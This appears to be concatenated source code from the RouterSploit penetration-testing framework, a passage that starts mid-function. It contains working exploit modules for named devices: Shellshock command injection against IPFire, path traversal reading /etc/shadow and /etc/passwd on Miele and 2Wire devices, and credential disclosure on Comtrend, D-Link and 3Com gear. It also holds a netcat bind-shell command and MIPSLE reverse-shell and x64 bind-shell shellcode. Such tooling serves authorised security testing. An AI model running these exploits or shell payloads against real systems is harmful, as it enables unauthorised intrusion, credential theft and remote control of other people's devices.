            return True  # target is vulnerable

        return False  # target is not vulnerable



import ftplib
import io

from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_error
from routersploit.core.exploit.printer import print_success


FTP_TIMEOUT = 8.0


class FTPCli:
    """ FTP Client provides methods to handle communication with FTP server """

    def __init__(self, ftp_target: str, ftp_port: int, ssl: bool = False, verbosity: bool = False) -> None:
        """ FTP client constructor

        :param str ftp_target: target FTP server ip address
        :param int ftp_port: target FTP server port
        :param bool ssl: target FTP ssl enabled
        :param bool verbosity: display verbose output
        :return None:
        """

        self.ftp_target = ftp_target
        self.ftp_port = ftp_port
        self.verbosity = verbosity

        self.peer = "{}:{}".format(self.ftp_target, ftp_port)

        if ssl:
            self.ftp_client = ftplib.FTP_TLS()
        else:
            self.ftp_client = ftplib.FTP()

    def connect(self, retries: int = 1) -> bool:
        """ Connect to FTP server

        :param int retries: number of retry attempts
        :return bool: True if connection was successful, False otherwise
        """

        for _ in range(retries):
            try:
                self.ftp_client.connect(self.ftp_target, self.ftp_port, timeout=FTP_TIMEOUT)
                return True
            except Exception as err:
                print_error(self.peer, "FTP Error while connecting to the server", err, verbose=self.verbosity)

            self.ftp_client.close()

        return False

    def login(self, username: str, password: str) -> bool:
        """ Login to FTP server

        :param str username: FTP account username
        :param str password: FTP account password
        :return bool: True if login was successful, False otherwise
        """

        try:
            self.ftp_client.login(username, password)
            print_success(self.peer, "FTP Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
            return True
        except Exception:
            print_error(self.peer, "FTP Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)

        self.ftp_client.close()
        return False

    def test_connect(self) -> bool:
        """ Test connection to FTP server

        :return bool: True if connection was successful, False otherwise
        """

        if self.connect():
            self.ftp_client.close()
            return True

        return False

    def get_content(self, remote_file: str) -> str:
        """ Get remote file from FTP server

        :param str remote_file: remote file name
        :return str: remote file content
        """

        try:
            fp_content = io.BytesIO()
            self.ftp_client.retrbinary("RETR {}".format(remote_file), fp_content.write)
            return fp_content.getvalue()
        except Exception as err:
            print_error(self.peer, "FTP Error while retrieving content", err, verbose=self.verbosity)

        return None

    def close(self) -> bool:
        """ Close FTP connection

        :return bool: True if closing connection was successful, False otherwise
        """

        try:
            self.ftp_client.close()
            return True
        except Exception as err:
            print_error(self.peer, "FTP Error while closing connection", err, verbose=self.verbosity)

        return False


# pylint: disable=no-member
class FTPClient(Exploit):
    """ FTP Client exploit """

    target_protocol = Protocol.FTP

    ssl = OptBool(False, "SSL enabled: true/false")
    verbosity = OptBool(True, "Enable verbose output: true/false")

    def ftp_create(self, target: str = None, port: int = None) -> FTPCli:
        """ Create FTP client

        :param str target: target FTP server ip address
        :param int port: target FTP server port
        :return FTPCli: FTP client object
        """

        ftp_target = target if target else self.target
        ftp_port = port if port else self.port

        ftp_client = FTPCli(ftp_target, ftp_port, ssl=self.ssl, verbosity=self.verbosity)
        return ftp_client



import re
import os
import importlib
import string
import random
from functools import wraps

import routersploit.modules as rsf_modules
import routersploit.resources as resources
import routersploit.resources.wordlists as wordlists

from routersploit.core.exploit.printer import print_error, print_info
from routersploit.core.exploit.exceptions import RoutersploitException

MODULES_DIR = rsf_modules.__path__[0]
RESOURCES_DIR = resources.__path__[0]
WORDLISTS_DIR = wordlists.__path__[0]


def random_text(length: int, alph: str = string.ascii_letters + string.digits) -> str:
    """ Generates random string text

    :param int length: length of text to generate
    :param str alph: string of all possible characters to choose from
    :return str: generated random string of specified size
    """

    return "".join(random.choice(alph) for _ in range(length))


def is_ipv4(address: str) -> bool:
    """ Checks if given address is valid IPv4 address

    :param str address: IP address to check
    :return bool: True if address is valid IPv4 address, False otherwise
    """

    regexp = "^(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
    if re.match(regexp, address):
        return True

    return False


def is_ipv6(address: str) -> bool:
    """ Checks if given address is valid IPv6 address

    :param str address: IP address to check
    :return bool: True if address is valid IPv6 address, False otherwise
    """

    regexp = "^(?:(?:[0-9A-Fa-f]{1,4}:){6}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|::(?:[0-9A-Fa-f]{1,4}:){5}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){4}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){3}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,2}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){2}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,3}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}:(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,4}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,5}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}|(?:(?:[0-9A-Fa-f]{1,4}:){,6}[0-9A-Fa-f]{1,4})?::)%.*$"

    if re.match(regexp, address):
        return True

    return False


def convert_ip(address: str) -> bytes:
    """ Converts IP to bytes

    :param str address: IP address that should be converted to bytes
    :return bytes: IP converted to bytes format
    """

    res = b""
    for i in address.split("."):
        res += bytes([int(i)])
    return res


def convert_port(port: int) -> bytes:
    """ Converts Port to bytes

    :param int port: port that should be conveted to bytes
    :return bytes: port converted to bytes format
    """

    res = "%.4x" % int(port)
    return bytes.fromhex(res)


def index_modules(modules_directory: str = MODULES_DIR) -> list:
    """ Returns list of all exploits modules

    :param str modules_directory: path to modules directory
    :return list: list of found modules
    """

    modules = []
    for root, dirs, files in os.walk(modules_directory):
        _, package, root = root.rpartition("routersploit/modules/".replace("/", os.sep))
        root = root.replace(os.sep, ".")
        files = filter(lambda x: not x.startswith("__") and x.endswith(".py"), files)
        modules.extend(map(lambda x: ".".join((root, os.path.splitext(x)[0])), files))

    return modules


def import_exploit(path: str):
    """ Imports exploit module

    :param str path: absolute path to exploit e.g. routersploit.modules.exploits.asus_auth_bypass
    :return: exploit module or error
    """

    try:
        module = importlib.import_module(path)
        if hasattr(module, "Payload"):
            return getattr(module, "Payload")
        elif hasattr(module, "Encoder"):
            return getattr(module, "Encoder")
        elif hasattr(module, "Exploit"):
            return getattr(module, "Exploit")
        else:
            raise ImportError("No module named '{}'".format(path))

    except (ImportError, AttributeError, KeyError) as err:
        raise RoutersploitException(
            "Error during loading '{}'\n\n"
            "Error: {}\n\n"
            "It should be valid path to the module. "
            "Use <tab> key multiple times for completion.".format(humanize_path(path), err)
        )


def iter_modules(modules_directory: str = MODULES_DIR) -> list:
    """ Iterates over valid modules

    :param str modules_directory: path to modules directory
    :return list: list of found modules
    """

    modules = index_modules(modules_directory)
    modules = map(lambda x: "".join(["routersploit.modules.", x]), modules)
    for path in modules:
        yield import_exploit(path)


def pythonize_path(path: str) -> str:
    """ Replaces argument to valid python dotted notation.

    ex. foo/bar/baz -> foo.bar.baz

    :param str path: path to pythonize
    :return str: pythonized path
    """

    return path.replace("/", ".")


def humanize_path(path: str) -> str:
    """ Replace python dotted path to directory-like one.

    ex. foo.bar.baz -> foo/bar/baz

    :param str path: path to humanize
    :return str: humanized path
    """

    return path.replace(".", "/")


def module_required(fn):
    """ Checks if module is loaded.

    Decorator that checks if any module is activated
    before executing command specific to modules (ex. 'run').
    """

    @wraps(fn)
    def wrapper(self, *args, **kwargs):
        if not self.current_module:
            print_error("You have to activate any module with 'use' command.")
            return
        return fn(self, *args, **kwargs)

    try:
        name = "module_required"
        wrapper.__decorators__.append(name)
    except AttributeError:
        wrapper.__decorators__ = [name]
    return wrapper


def stop_after(space_number):
    """ Decorator that determines when to stop tab-completion

    Decorator that tells command specific complete function
    (ex. "complete_use") when to stop tab-completion.
    Decorator counts number of spaces (' ') in line in order
    to determine when to stop.

        ex. "use exploits/dlink/specific_module " -> stop complete after 2 spaces
        "set rhost " -> stop completing after 2 spaces
        "run " -> stop after 1 space

    :param space_number: number of spaces (' ') after which tab-completion should stop
    :return:
    """

    def _outer_wrapper(wrapped_function):
        @wraps(wrapped_function)
        def _wrapper(self, *args, **kwargs):
            try:
                if args[1].count(" ") == space_number:
                    return []
            except Exception as err:
                print_info(err)
            return wrapped_function(self, *args, **kwargs)
        return _wrapper
    return _outer_wrapper


def lookup_vendor(addr: str, resources_directory: str = RESOURCES_DIR) -> str:
    """ Lookups vendor (manufacturer) based on MAC address

    :param str addr: MAC address to lookup
    :param str resources_directory: path to resources directory
    :return str: vendor name from oui.dat database
    """

    addr = addr.upper().replace(":", "")

    path = os.path.join(resources_directory, "vendors/oui.dat")
    with open(path, "r") as f:
        for line in f.readlines():
            line = line.strip()
            if line == "" or line[0] == "#":
                continue

            mac, name = line.split(" ", 1)
            if addr.startswith(mac):
                return name

    return None


class Version:
    def __init__(self, value):
        self.value = str(value)

    def __set__(self, value):
        self.value = value

    def __lt__(self, other):
        """ Override the default x<y """
        if self._compare_versions(self.value, other.value) < 0:
            return True
        return False

    def __le__(self, other):
        """Override the default x<=y"""
        if self._compare_versions(self.value, other.value) <= 0:
            return True
        return False

    def __eq__(self, other):
        """Override the default x==y"""
        return self.value == other.value

    def __ne__(self, other):
        """Override the default x!=y or x<>y"""
        return self.value != other.value

    def __gt__(self, other):
        """Override the defualt x>y"""
        if self._compare_versions(self.value, other.value) > 0:
            return True
        return False

    def __ge__(self, other):
        """Override the default x>=y"""
        if self._compare_versions(self.value, other.value) >= 0:
            return True
        return False

    @staticmethod
    def _compare_versions(version1, version2):
        """ Version comparision

        :param Version version1:
        :param Version version2:
        :return int:
            if version1 < version2 then -1
            if version1 == version2 then 0
            if version1 > version2 then 1
        """

        arr1 = re.sub(r"\D", ".", str(version1)).split(".")
        arr2 = re.sub(r"\D", ".", str(version2)).split(".")

        i = 0

        while (i < len(arr1)):
            if int(arr2[i]) > int(arr1[i]):
                return -1

            if int(arr1[i]) > int(arr2[i]):
                return 1

            i += 1

        return 0


def detect_file_content(content: str, f: str = "/etc/passwd") -> bool:
    """ Detect specific file content in content

    :param str content: file content that should be analyzed
    :param str f: file that the content should be compared with
    :return bool: True if the content was recognized, False otherwise
    """

    if f in ["/etc/passwd", "/etc/shadow"]:
        if re.findall(r"(root|[aA]dmin):.*?:.*?:.*?:.*?:.*?:", content):
            return True

    return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "IPFire Shellshock",
        "description": "Exploits shellshock vulnerability in IPFire <= 2.15 Core Update 82. "
                       "If the target is vulnerable it is possible to execute commands on operating system level.",
        "authors": (
            "Claudio Viviani",  # vulnerability discovery
            "Marcin Bury <marcin@threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/34839",
        ),
        "devices": (
            "IPFire <= 2.15 Core Update 82",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(444, "Target HTTP port")
    ssl = OptBool(True, "SSL enabled: true/false")

    username = OptString("admin", "Username to log in with")
    password = OptString("admin", "Password to log in with")

    def __init__(self):
        self.payload = "() { :;}; /bin/bash -c '{{cmd}}'"

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        marker = utils.random_text(32)
        cmd = "echo {};{}".format(marker, cmd)
        payload = self.payload.replace("{{cmd}}", cmd)

        headers = {
            "VULN": payload,
        }

        response = self.http_request(
            method="GET",
            path="/cgi-bin/index.cgi",
            headers=headers,
            auth=(self.username, self.password)
        )
        if response is None:
            return ""

        if response.status_code == 200:
            start = response.text.find(marker) + len(marker) + 1  # marker and whitespace
            end = response.text.find("<!DOCTYPE html>", start)

            return response.text[start:end]

        return ""

    @mute
    def check(self):
        marker = utils.random_text(32)
        cmd = "echo {}".format(marker)
        payload = self.payload.replace("{{cmd}}", cmd)

        headers = {
            "VULN": payload,
        }

        response = self.http_request(
            method="GET",
            path="/cgi-bin/index.cgi",
            headers=headers,
            auth=(self.username, self.password)
        )

        if response and marker in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload


class Payload(BindTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Netcat Bind TCP",
        "description": "Creates interactive tcp bind shell by using netcat.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    cmd = OptString("nc", "Netcat binary")
    shell_binary = OptString("/bin/sh", "Shell")

    def generate(self):
        return "{} -lvp {} -e {}".format(self.cmd,
                                         self.rport,
                                         self.shell_binary)



import re
from base64 import b64decode
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Comtrend CT 5361T Password Disclosure",
        "description": "WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability",
        "authors": (
            "TUNISIAN CYBER",  # routersploit module
        ),
        "references": (
            "https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html",
        ),
        "devices": (
            "Comtrend CT 5361T (more likely CT 536X)",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            response = self.http_request(
                method="GET",
                path="/password.cgi",
            )
            if response is None:
                return

            regexps = [
                ("admin", "pwdAdmin = '(.+?)'"),
                ("support", "pwdSupport = '(.+?)'"),
                ("user", "pwdUser = '(.+?)'")
            ]

            creds = []
            for regexp in regexps:
                res = re.findall(regexp[1], response.text)

                if res:
                    value = str(b64decode(res[0]), "utf-8")
                    creds.append((regexp[0], value))

            if len(creds):
                print_success("Credentials found!")
                headers = ("Login", "Password")
                print_table(headers, *creds)
                print_info("NOTE: Admin is commonly implemented as root")
            else:
                print_error("Credentials could not be found")
        else:
            print_error("Device seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/password.cgi",
        )

        if response is None:
            return False  # target is not vulnerable

        regexps = ["pwdAdmin = '(.+?)'",
                   "pwdSupport = '(.+?)'",
                   "pwdUser = '(.+?)'"]

        for regexp in regexps:
            res = re.findall(regexp, response.text)

            if len(res):
                try:
                    b64decode(res[0])  # checking if data is base64 encoded
                except Exception:
                    return False  # target is not vulnerable
            else:
                return False  # target is not vulnerable

        return True  # target is vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Miele Professional PG 8528 Path Traversal",
        "description": "Module exploits Miele Professional PG 8528 Path Traversal vulnerability which allows "
                       "to read any file on the system.",
        "authors": (
            "Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7240",
            "https://www.exploit-db.com/exploits/41718/",
        ),
        "devices": (
            "Miele Professional PG 8528 PST10",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/shadow", "File to read from filesystem")

    def run(self):
        if self.check():
            path = "/../../../../../../../../../../../..{}".format(self.filename)

            response = self.http_request(
                method="GET",
                path=path
            )

            if response is None:
                return

            if response.status_code == 200 and response.text:
                print_success("Success! File: %s" % self.filename)
                print_info(response.text)
            else:
                print_error("Exploit failed")
        else:
            print_error("Device seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/../../../../../../../../../../../../etc/shadow"
        )

        if response and utils.detect_file_content(response.text, "/etc/shadow"):
            return True  # target vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "2Wire 4011G & 5012NV Path Traversal",
        "description": "Module exploits path traversal vulnerability in 2Wire 4011G and 5012NV devices. "
                       "If the target is vulnerable it is possible to read file from the filesystem.",
        "authors": (
            "adiaz",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.underground.org.mx/index.php?topic=28616.0",
        ),
        "devices": (
            "2Wire 4011G",
            "2Wire 5012NV",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/passwd", "File to read from the filesystem")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            print_status("Sending read {} file request".format(self.filename))

            headers = {"Content-Type": "application/x-www-form-urlencoded"}
            data = {
                "__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
                "__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
                "__ENH_ERROR_REDIRECT_PATH__": "",
                "username": "tech"
            }

            response = self.http_request(
                method="POST",
                path="/goform/enhAuthHandler",
                headers=headers,
                data=data,
            )

            if response is None:
                return

            print_status("Reading file {}".format(self.filename))
            print_info(response.text)
        else:
            print_error("Target seems to be not vulnerable")

    @mute
    def check(self):
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        data = {
            "__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../../etc/passwd",
            "__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
            "__ENH_ERROR_REDIRECT_PATH__": "",
            "username": "tech"
        }
        response = self.http_request(
            method="POST",
            path="/goform/enhAuthHandler",
            headers=headers,
            data=data,
        )

        if response and utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "3Com OfficeConnect Info Disclosure",
        "description": "Exploits 3Com OfficeConnect information disclosure vulnerability. "
                       "If the target is vulnerable it is possible to read sensitive information.",
        "authors": (
            "Luca Carettoni <luca.carettoni[at]ikkisoft.com>",  # vulnerablity discovery
            "iDefense",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://old.sebug.net/paper/Exploits-Archives/2009-exploits/0902-exploits/LC-2008-05.txt",
            "http://seclists.org/vulnwatch/2005/q1/42",
        ),
        "devices": (
            "3Com OfficeConnect",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def __init__(self):
        self.paths = [
            "/SaveCfgFile.cgi",
            "/main/config.bin",
            "/main/profile.wlp?PN=ggg",
            "/main/event.logs"
        ]

        self.valid = None

    def run(self):
        if self.check():
            print_status("Sending payload request")
            response = self.http_request(
                method="GET",
                path=self.valid,
            )

            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success")
                print_info(response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        for path in self.paths:
            response = self.http_request(
                method="GET",
                path=path
            )

            if response is None:
                return False  # target is not vulnerable

            if "pppoe_username" in response.text and "pppoe_password" in response.text:
                self.valid = path
                return True  # target is vulnerable

        return False  # target not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure",
        "description": "Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600,"
                       "DIR-615 devices. It is possible to retrieve sensitive information such as credentials.",
        "authors": (
            "tytusromekiatomek <tytusromekiatomek[at]inbox.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
            "Aleksandr Mikhaylov <chelaxe[at]gmail.com>",  # routersploit module
        ),
        "references": (
            "http://seclists.org/bugtraq/2013/Dec/11",
        ),
        "devices": (
            "D-Link DIR-300 (all)",
            "D-Link DIR-320 (all)",
            "D-Link DIR-600 (all)",
            "D-Link DIR-615 (fw 4.0)",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        response = self.http_request(
            method="GET",
            path="/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"
        )
        if response is None:
            return

        creds = re.findall("\n\t\t\t(.+?):(.+?)(?:\n\n\t\t\t|\nuser)", response.text)

        if len(creds):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"
        )
        if response is None:
            return False  # target is not vulnerable

        creds = re.findall("\n\t\t\t(.+?):(.+?)(?:\n\n\t\t\t|\nuser)", response.text)

        if len(creds):
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
    ArchitectureSpecificPayload,
    Architectures,
    ReverseTCPPayloadMixin,
)


class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
    __info__ = {
        "name": "MIPSLE Reverse TCP",
        "description": "Creates interactive tcp reverse shell for MIPSLE architecture.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.MIPSLE

    def generate(self):
        reverse_ip = utils.convert_ip(self.lhost)
        reverse_port = utils.convert_port(self.lport)

        return (
            b"\xff\xff\x04\x28" +            # slti    a0,zero,-1
            b"\xa6\x0f\x02\x24" +            # li      v0,4006
            b"\x0c\x09\x09\x01" +            # syscall 0x42424
            b"\x11\x11\x04\x28" +            # slti    a0,zero,4369
            b"\xa6\x0f\x02\x24" +            # li      v0,4006
            b"\x0c\x09\x09\x01" +            # syscall 0x42424
            b"\xfd\xff\x0c\x24" +            # li      t4,-3
            b"\x27\x20\x80\x01" +            # nor     a0,t4,zero
            b"\xa6\x0f\x02\x24" +            # li      v0,4006
            b"\x0c\x09\x09\x01" +            # syscall 0x42424
            b"\xfd\xff\x0c\x24" +            # li      t4,-3
            b"\x27\x20\x80\x01" +            # nor     a0,t4,zero
            b"\x27\x28\x80\x01" +            # nor     a1,t4,zero
            b"\xff\xff\x06\x28" +            # slti    a2,zero,-1
            b"\x57\x10\x02\x24" +            # li      v0,4183
            b"\x0c\x09\x09\x01" +            # syscall 0x42424
            b"\xff\xff\x44\x30" +            # andi    a0,v0,0xffff
            b"\xc9\x0f\x02\x24" +            # li      v0,4041
            b"\x0c\x09\x09\x01" +            # syscall 0x42424
            b"\xc9\x0f\x02\x24" +            # li      v0,4041
            b"\x0c\x09\x09\x01" +            # syscall 0x42424
            reverse_port + b"\x05\x3c" +     # "\x7a\x69" lui     a1,0x697a
            b"\x02\x00\xa5\x34" +            # ori     a1,a1,0x2
            b"\xf8\xff\xa5\xaf" +            # sw      a1,-8(sp)
            reverse_ip[2:] + b"\x05\x3c" +   # "\x00\x01" lui     a1,0x100
            reverse_ip[:2] + b"\xa5\x34" +   # "\x7f\x00" ori     a1,a1,0x7f
            b"\xfc\xff\xa5\xaf" +            # sw      a1,-4(sp)
            b"\xf8\xff\xa5\x23" +            # addi    a1,sp,-8
            b"\xef\xff\x0c\x24" +            # li      t4,-17
            b"\x27\x30\x80\x01" +            # nor     a2,t4,zero
            b"\x4a\x10\x02\x24" +            # li      v0,4170
            b"\x0c\x09\x09\x01" +            # syscall 0x42424
            b"\x62\x69\x08\x3c" +            # lui     t0,0x6962
            b"\x2f\x2f\x08\x35" +            # ori     t0,t0,0x2f2f
            b"\xec\xff\xa8\xaf" +            # sw      t0,-20(sp)
            b"\x73\x68\x08\x3c" +            # lui     t0,0x6873
            b"\x6e\x2f\x08\x35" +            # ori     t0,t0,0x2f6e
            b"\xf0\xff\xa8\xaf" +            # sw      t0,-16(sp)
            b"\xff\xff\x07\x28" +            # slti    a3,zero,-1
            b"\xf4\xff\xa7\xaf" +            # sw      a3,-12(sp)
            b"\xfc\xff\xa7\xaf" +            # sw      a3,-4(sp)
            b"\xec\xff\xa4\x23" +            # addi    a0,sp,-20
            b"\xec\xff\xa8\x23" +            # addi    t0,sp,-20
            b"\xf8\xff\xa8\xaf" +            # sw      t0,-8(sp)
            b"\xf8\xff\xa5\x23" +            # addi    a1,sp,-8
            b"\xec\xff\xbd\x27" +            # addiu   sp,sp,-20
            b"\xff\xff\x06\x28" +            # slti    a2,zero,-1
            b"\xab\x0f\x02\x24" +            # li      v0,4011
            b"\x0c\x09\x09\x01"              # syscall 0x42424
        )



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
    ArchitectureSpecificPayload,
    Architectures,
    BindTCPPayloadMixin,
)


class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
    __info__ = {
        "name": "X64 Bind TCP",
        "description": "Creates interactive tcp bind shell for X64 architecture.",
        "authors": (
            "ricky",  # metasploit module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        )
    }

    architecture = Architectures.X64

    def generate(self):
        bind_port = utils.convert_port(self.rport)

        return (
            b"\x6a\x29" +                      # pushq  $0x29
            b"\x58" +                          # pop    %rax
            b"\x99" +                          # cltd
            b"\x6a\x02" +                      # pushq  $0x2
            b"\x5f" +                          # pop    %rdi
            b"\x6a\x01" +                      # pushq  $0x1
            b"\x5e" +                          # pop    %rsi
            b"\x0f\x05" +                      # syscall
            b"\x48\x97" +                      # xchg   %rax,%rdi
            b"\x52" +                          # push   %rdx
            b"\xc7\x04\x24\x02\x00" +          # movl   $0xb3150002,(%rsp)
            bind_port +                        # port
            b"\x48\x89\xe6" +                  # mov    %rsp,%rsi
            b"\x6a\x10" +                      # pushq  $0x10
            b"\x5a" +                          # pop    %rdx
            b"\x6a\x31" +                      # pushq  $0x31
            b"\x58" +                          # pop    %rax
            b"\x0f\x05" +                      # syscall
            b"\x6a\x32" +                      # pushq  $0x32
            b"\x58" +                          # pop    %rax
            b"\x0f\x05" +                      # syscall
            b"\x48\x31\xf6" +                  # xor    %rsi,%rsi
            b"\x6a\x2b" +                      # pushq  $0x2b
            b"\x58" +                          # pop    %rax
            b"\x0f\x05" +                      # syscall
            b"\x48\x97" +                      # xchg   %rax,%rdi
            b"\x6a\x03" +                      # pushq  $0x3
            b"\x5e" +                          # pop    %rsi
            b"\x48\xff\xce" +                  # dec    %rsi
            b"\x6a\x21" +                      # pushq  $0x21
            b"\x58" +                          # pop    %rax
            b"\x0f\x05" +                      # syscall
            b"\x75\xf6" +                      # jne    33 <dup2_loop>
            b"\x6a\x3b" +                      # pushq  $0x3b
            b"\x58" +                          # pop    %rax
            b"\x99" +                          # cltd
            b"\x48\xbb\x2f\x62\x69\x6e\x2f" +  # movabs $0x68732f6e69622f,%rbx
            b"\x73\x68\x00" +                  #
            b"\x53" +                          # push   %rbx
            b"\x48\x89\xe7" +                  # mov    %rsp,%rdi
            b"\x52" +                          # push   %rdx
            b"\x57" +                          # push   %rdi
            b"\x48\x89\xe6" +                  # mov    %rsp,%rsi
            b"\x0f\x05"                        # syscall
        )
